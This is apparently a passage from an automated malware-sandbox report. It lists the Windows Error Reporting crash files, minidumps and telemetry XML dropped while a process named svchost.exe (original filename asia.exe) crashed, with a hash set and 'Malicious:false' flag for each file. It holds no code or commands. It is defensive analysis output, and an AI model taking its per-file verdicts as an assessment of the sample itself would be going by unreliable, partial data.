                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.6.2.6.4.6.2.5.5.8.8.1.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.6.2.6.4.7.1.9.4.9.4.5.0.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.7.3.f.7.9.e.4.-.0.d.6.a.-.4.4.e.e.-.9.5.d.8.-.f.8.2.7.3.c.f.a.b.5.a.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.2.5.8.7.3.2.6.-.b.2.d.7.-.4.d.1.b.-.a.7.7.1.-.4.5.4.1.f.2.d.c.0.a.d.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.a.s.i.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.7.0.-.0.0.0.1.-.0.0.1.4.-.d.0.e.9.-.5.a.4.4.1.8.a.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.0.c.b.b.e.a.e.b.4.0.4.d.d.9.1.d.0.0.e.6.3.c.f.4.2.a.b.5.e.1.a.0.0.0.0.0.0.0.0.!.0.0.0.0.f.e.2.5.9.3.1.e.1.2.b.1.f.5.8.0.7.b.9.5.c.f.2.2.2.c.d.9.e.e.7.4.c.2.c.b.7.e.a.2.!.s.v.c.h.o.s.t...e.x.e.....T.a.r.g.e.
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):1.1450276431159463
                                                                        Encrypted:false
                                                                        SSDEEP:192:P94w2gAS50uvdugaKTHyfKlibdzuiFZZ24lO8r:F4w2gIuvdVaMHk1ZzuiFZY4lO8r
                                                                        MD5:713B0D28902ADC7EC535E3D2A17F603D
                                                                        SHA1:FF470E3EA7185C3E42B54CBF289C48D2C03E1540
                                                                        SHA-256:A4412C68A5A0C9D6A69DE4593B4F52E1057253A32E4E87A5AFF4443B90498A44
                                                                        SHA-512:E4C48265437760DD27BA254315153D24F32CCCF5FED995045FA4CBC9CFBE19E4A118B6B064F1B9F877399708655083D8F3CC889CC83B0E68B1AB07C5D2C1F75E
                                                                        Malicious:false
                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.6.2.6.4.6.7.7.5.0.4.8.7.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.6.2.6.4.6.8.8.1.2.9.9.3.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.2.f.9.d.e.f.d.-.9.7.4.f.-.4.6.9.a.-.b.9.9.9.-.c.e.2.0.7.f.8.d.0.8.6.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.2.f.b.d.7.f.3.-.7.0.5.3.-.4.9.9.6.-.b.f.4.5.-.7.7.b.6.3.d.3.c.0.6.b.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.a.s.i.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.c.0.-.0.0.0.1.-.0.0.1.4.-.0.c.4.1.-.b.c.4.5.1.8.a.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.0.c.b.b.e.a.e.b.4.0.4.d.d.9.1.d.0.0.e.6.3.c.f.4.2.a.b.5.e.1.a.0.0.0.0.0.0.0.0.!.0.0.0.0.f.e.2.5.9.3.1.e.1.2.b.1.f.5.8.0.7.b.9.5.c.f.2.2.2.c.d.9.e.e.7.4.c.2.c.b.7.e.a.2.!.s.v.c.h.o.s.t...e.x.e.....T.a.r.g.
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):1.1448930736438263
                                                                        Encrypted:false
                                                                        SSDEEP:192:O0RAIgAS50uvdugaKTHyfKlibdzuiFZZ24lO8r:bRAIgIuvdVaMHk1ZzuiFZY4lO8r
                                                                        MD5:C26C07D5894ACC07A152A0CBD6C4A2B8
                                                                        SHA1:10774BC75B18955A3CDD186338FA42F1FAF3F829
                                                                        SHA-256:87EEC387341C747A50AC67B07D94E2BC2ECEB7D4C3127A7C1345A2B44E213E05
                                                                        SHA-512:E01268A3A7417B9325C5D7DFC7D76D090F22043009D4326F90C8F0D2F55F55D5DF28AA16644EC82ADD53242829197399E80C705638EAFA8D26A4E5E5394F6D02
                                                                        Malicious:false
                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.6.2.6.4.8.1.5.0.2.0.2.4.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.6.2.6.4.8.4.4.3.9.5.2.7.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.9.0.b.5.5.9.b.-.a.0.3.2.-.4.2.b.3.-.a.d.8.3.-.8.8.3.9.1.f.d.b.8.3.a.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.a.4.4.0.e.7.e.-.0.a.4.0.-.4.5.d.a.-.a.e.5.f.-.f.5.9.5.5.d.b.9.6.2.f.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.a.s.i.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.2.0.c.c.-.0.0.0.1.-.0.0.1.4.-.5.d.5.4.-.2.4.5.0.1.8.a.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.0.c.b.b.e.a.e.b.4.0.4.d.d.9.1.d.0.0.e.6.3.c.f.4.2.a.b.5.e.1.a.0.0.0.0.0.0.0.0.!.0.0.0.0.f.e.2.5.9.3.1.e.1.2.b.1.f.5.8.0.7.b.9.5.c.f.2.2.2.c.d.9.e.e.7.4.c.2.c.b.7.e.a.2.!.s.v.c.h.o.s.t...e.x.e.....T.a.r.g.
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):1.144635023285111
                                                                        Encrypted:false
                                                                        SSDEEP:192:K9ra6/gAS50uvdugaKTHyfKlibdzuiFZZ24lO8r:mra6gIuvdVaMHk1ZzuiFZY4lO8r
                                                                        MD5:F396BC4D254B5D118F5F8C14D1508FE5
                                                                        SHA1:213C3FD03836BA99508982ACD22D8FC467B2AAC9
                                                                        SHA-256:1184D2B46BCEA62346736FB938FF20868E53B17BA33A5DE2CC69F64F551C3557
                                                                        SHA-512:463181071D5C27107EC7B469256BCBCB693F225255DD570DE3E5DD190DCD0B79CCAF8A3FFFD66699EE7E2A481933D0CD334702F98E08ADC32E10A828D0C3858D
                                                                        Malicious:false
                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.6.2.6.4.7.3.6.2.1.5.9.3.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.6.2.6.4.7.4.4.0.2.8.5.7.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.7.0.a.1.2.5.f.-.2.4.b.2.-.4.0.4.d.-.a.e.8.4.-.f.6.e.d.0.4.c.d.2.e.e.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.6.8.d.7.c.3.f.-.f.9.2.7.-.4.8.3.3.-.b.b.5.c.-.c.a.3.b.7.2.2.8.2.c.2.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.a.s.i.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.4.4.-.0.0.0.1.-.0.0.1.4.-.4.9.f.f.-.f.9.4.9.1.8.a.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.0.c.b.b.e.a.e.b.4.0.4.d.d.9.1.d.0.0.e.6.3.c.f.4.2.a.b.5.e.1.a.0.0.0.0.0.0.0.0.!.0.0.0.0.f.e.2.5.9.3.1.e.1.2.b.1.f.5.8.0.7.b.9.5.c.f.2.2.2.c.d.9.e.e.7.4.c.2.c.b.7.e.a.2.!.s.v.c.h.o.s.t...e.x.e.....T.a.r.g.
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:Mini DuMP crash report, 16 streams, Wed May 8 07:21:04 2024, 0x1205a4 type
                                                                        Category:dropped
                                                                        Size (bytes):508525
                                                                        Entropy (8bit):3.2824855377434616
                                                                        Encrypted:false
                                                                        SSDEEP:3072:uN0+aadLFQ3eeKW+4QNyBQhcSUy7339TRPHv9z1CCqnqpk1i23+vU1AtdN9tdN9P:uO+1dLy5+BRUAPHFrqn11i23Q
                                                                        MD5:985B7196D74CE1C3CCCC3CDE8B37FAB1
                                                                        SHA1:B8EDD13C6223805B2FB63D92C139A4477147FA5A
                                                                        SHA-256:02E14CBF70B8FDC606D96551711C6D0235A4EE80F4275B61E2DB784CB72B4D84
                                                                        SHA-512:2DA78F7F17266EFC2F7B77486E721057DBEEF4D83C1BEAEBA73201BD0D8A529A85BB5909D4B0C8E82CA2298B165815797F227F372AF209EE4BAF1127323C4785
                                                                        Malicious:false
                                                                        Preview:MDMP..a..... ........';f........................H...........$....&...... ...0&.......U..............l.......8...........T........... ;..M...........PD..........<F..............................................................................eJ.......F......Lw......................T.......p....';f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:Mini DuMP crash report, 16 streams, Wed May 8 07:21:08 2024, 0x1205a4 type
                                                                        Category:dropped
                                                                        Size (bytes):502183
                                                                        Entropy (8bit):3.265670317393611
                                                                        Encrypted:false
                                                                        SSDEEP:3072:ShCe92iOMVk4IZO9ZjJvBCGa4+IcSLdyF61CCq9n13+vFFr8nluU:SEbFMkoGOJ7qd13Q8l
                                                                        MD5:D9D04D7059A2817DE881E3AC4D41F3CE
                                                                        SHA1:49214181E65BF1B35577941C0DBD01A05D13076E
                                                                        SHA-256:9FAFD24D63D4E8E09DB0D14E70451B1189C7ECFFA2B198CD2F614488FC039554
                                                                        SHA-512:B7D884317FC58245CB1E94BF4CA7D1E350B5C42F07DA20662F703082314F7B26FBDA50D741EEAC28454554CFF37E38F2EE63FE68AB6315B9AC8ADEB880A8ECBC
                                                                        Malicious:false
                                                                        Preview:MDMP..a..... ........';f........................p...........$...4%...... ...X%.......P..............l.......8...........T............<...m..........xC..........dE..............................................................................eJ.......E......Lw......................T............';f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):6758
                                                                        Entropy (8bit):3.733112752237589
                                                                        Encrypted:false
                                                                        SSDEEP:192:R6l7wVeJtj7ZdVY4Ad6J0Npro89bnWYf0sNm:R6lXJR7ZdVY44iknhf0L
                                                                        MD5:DF006D7694E7A10FDF29B75D1025ED9D
                                                                        SHA1:35C432D5A95AFC577FC7C5C391E892AF28BD2F46
                                                                        SHA-256:8BF62081110B1F7CD147CEB5A3983BABA597EF6C528D36D6F9EA2E920BC398DF
                                                                        SHA-512:FEE826813FE2DC06FE481D2D66693BCB64F160595112FA505549327DC97A4351EE2DA147B45A3C41C89DD77CD799C6687EB5DBFCD46E663F802CB11E6E03076B
                                                                        Malicious:false
                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.8.7.2.<./.P.i.
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):4741
                                                                        Entropy (8bit):4.4850374449629395
                                                                        Encrypted:false
                                                                        SSDEEP:48:cvIwWl8zsCJg771I9ZOWpW8VYmYm8M4JCyx2Fcryq85LI5LKtF7d:uIjfQI76v7VuJCYrPutF7d
                                                                        MD5:BCE06B2ABB11214CDD03D3EB6492A8AF
                                                                        SHA1:B7F43C601D5ED65837F02B4E4E25DF1BEC0254A6
                                                                        SHA-256:2F943F373CC5914CEC6E7A09D5C7B0013CADFA79EE381C7DD1D4A17C03D8D0E7
                                                                        SHA-512:7099951995551EA1513664CCDBD809F6B0AD33452F40A8FABA085E72C0CC0222C750D3651C443623EDD6EDBAA98F0B4F11277BF95A326D796A9D0F69B9A4B871
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="313823" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):89708
                                                                        Entropy (8bit):3.015676307077526
                                                                        Encrypted:false
                                                                        SSDEEP:768:ovduBsYsA5bYLnAkQP842VvLayon+yYKCZOgy+axKl+HnYl1V:6dFYh5bYLJS8LVLayo+7KCwgy+CnYlX
                                                                        MD5:1A873C7F6A9EDA15D868E8CDB46ACA5C
                                                                        SHA1:9A27F3751DD6E49CF2CF15949C974D01F09BEF91
                                                                        SHA-256:00818275EB29EC5B6E557AA7438C015BFEBC0D0B979DB06F98C99973B623D2CD
                                                                        SHA-512:3BD581CE84EB11FB8F2EC1CEC213F04019B643787641D08E6021DCFB5DDA76C0CC868CAAF6E203F065843763B22556AA662FD11EAF52694045586CE7682F344D
                                                                        Malicious:false
                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):13340
                                                                        Entropy (8bit):2.6842338093922273
                                                                        Encrypted:false
                                                                        SSDEEP:96:TiZYWmozGCqYhDYH6WLHAYEZWqtEiy41NYwLH3QaeYiMMupiIa33:2ZDfqyg/mXQaeYXMupFa33
                                                                        MD5:6DA75440D2DFC9F232C802F6B38FC9AB
                                                                        SHA1:DD1748BE82540745C6EE2E5456C159CBFED8CE46
                                                                        SHA-256:08EAB1AE27DB6318B9C05A1CF9B112E09A1E8EA6098FC7945141ABA56B77681A
                                                                        SHA-512:BEBDDBA13EDFEC0A002BCB1ADEA5B21A1FC1D3D5A521242E6B5293C1FE55E98FC0AAE700087F60875516D4673E37291BEF38FE43187E6FB65BB48A2F9652723F
                                                                        Malicious:false
                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):8598
                                                                        Entropy (8bit):3.7013988928739225
                                                                        Encrypted:false
                                                                        SSDEEP:192:R6l7wVeJss7m6YEf9nMgmfZmAuJJkU2prw89bH5lfftm:R6lXJX7m6YEFMgmfUHJJ3+HLfo
                                                                        MD5:FE0C5C4D6EAD21B83D07AC8C5C436E43
                                                                        SHA1:4E6FC67F231A654BE161D9239B7A308920A05DF9
                                                                        SHA-256:66DFCC741596AE5BDA90ED02CA7F65E67C61ACDE49D99399EB83A69EC3890246
                                                                        SHA-512:956EBD8093301F5B1B1B686C60E057A5240783748926228A8A623E0B46C6D3215CB243EE501B0DADA7018AD92F3C9F84CD1E12AC25A67CD1091C61AA1068DC63
                                                                        Malicious:false
                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.9.2.<./.P.i.
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):4796
                                                                        Entropy (8bit):4.4784694108107885
                                                                        Encrypted:false
                                                                        SSDEEP:48:cvIwWl8zsCJg771I9ZOWpW8VYtYm8M4JCyxE6FPyq8v3xEWLKtFZd:uIjfQI76v7VBJC78WyWutFZd
                                                                        MD5:E79503B05EB54496A5E3C075908EA19D
                                                                        SHA1:28C30E870B43968420AFF77A533F385879BCC4B2
                                                                        SHA-256:0E154BF7A60E22FD102E27F1A30F1760D03871EB608ABA9799C22C88F6616B98
                                                                        SHA-512:24129300828B165E4A6F659EE307031FBF9A7A9D2A0B41694ED4D02DD9A6B9D21D53601560DCFA5565CAB462690EBF261CD57F362EB592E6F185C4365143A1D3
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="313823" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):90296
                                                                        Entropy (8bit):3.014745004795277
                                                                        Encrypted:false
                                                                        SSDEEP:1536:gnXFwYbMYLd8TVTuyf7zlhu+4CnYlFCn9L:gnXFwYbMYLd8TVTuyf7zlhu+4kYlFCnp
                                                                        MD5:7968B8BE0EB69E9DF28CFCD387BEEA72
                                                                        SHA1:B6EF9A318F1A97BB68FAE02F98E91DE4498E3424
                                                                        SHA-256:F919BAB3FE1E51230071DE41C907668FEBC8A8E1FD12EDA1DC7931445C3FEB30
                                                                        SHA-512:E773E7F88F147C11545A0C604D8261F4C81A81359D9DE0F7B7800E1889E2761E6001F6C7A42C4496FA8E6837453E2CB7D58495C314E61DD3B1142962F4171E74
                                                                        Malicious:false
